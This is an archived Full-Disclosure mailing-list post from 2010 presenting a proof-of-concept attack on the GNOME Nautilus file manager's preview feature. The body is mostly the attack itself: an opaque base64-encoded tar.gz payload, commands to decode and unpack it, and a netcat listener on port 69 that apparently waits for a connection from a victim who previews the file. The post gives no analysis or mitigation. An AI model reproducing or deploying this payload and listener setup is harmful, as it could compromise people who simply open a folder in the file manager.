lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 5 Feb 2010 22:53:04 +0100 (CET)
From: "Joe Dohn" <joe.dhon@...rige.nu>
To: full-disclosure@...ts.grok.org.uk
Subject: GNOME Nautilus

According to the GNOME documentations, the file manager (Nautilus) is able
to display a preview of most of the files. [ref:
http://library.gnome.org/users/user-guide/stable/gosnautilus-60.html.en]
This is a Proof Of Concept, it works using the default settings (Local
Files Only checked).

++++ BEGIN BASE64 CONTENT ++++
H4sIAMnba0sAA+3TW2vbMBQH8Lwmn8L4yYHUl1xp042tgbWBhIWmY4WxB9U+TrTJkisd59JPXylr
QtjD1hbKGJyfH2wsHekvS96UIlxiUXtLsdXvdt09GfTi47uTdON2LUk6nfag1+t3OrU4iXtJt+bF
b5rqSWWQac+r/VDwx35/a/9PnZtU8xLfN+oS0KSshNBAWmmO23Cm+YoLWMCUSbYAHYJkdwIOrwP/
i+Qr0IaJ29lISQkp+s1ho76yXzT33nkjVZRKgkQTpoIZA+ab/6FQD1wIFiq9iHI7TiRUysQw8b83
6mGqgSGMpd0UmUJwNACXCDpnKZhQmvHE1Xyy1W663DZy/MpxOWO4DPwIMI1KO986O8Th5jl57DdY
K/1zl+uEy7LCE4M2UvHCeC7Z2JXPd9UuBDe7lEHeijdx0nIHv9uSlRD7hOZ5EX/tl9uHXb5XxZsf
xvgtpNmn5KY59FwqDfc2lYS1dzudXCGW13BfgcHAdbeNoSpBBv7s8/zGb3n+0vY4i6KkPQhjeyVn
/dPIvkddwaHAnhjNM5jyAm62pT1FCBuMNoXw910M4NM0V8Ay0IE/0pBxNG6K/FpdXj60vLk9phdq
403YnTmqlNlHc8El09vArcauLNs9sBXjwi05aDZt7/Nof/D/9R9ICCGEEEIIIYQQQgghhBBCCCGE
EELI6z0CpVq6YQAoAAA=
++++ END BASE64 CONTENT ++++

sloshy@thx:~$ sudo nc -v -l -p 69
listening on [any] 69 ...

base64 -d poc.b64 > poc.tar.gz
tar zxf poc.tar.gz


May the Poc be with you :]=~






































-----------------------------------------
Skaffa gratis e-post du också på http://www.sverige.nu



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ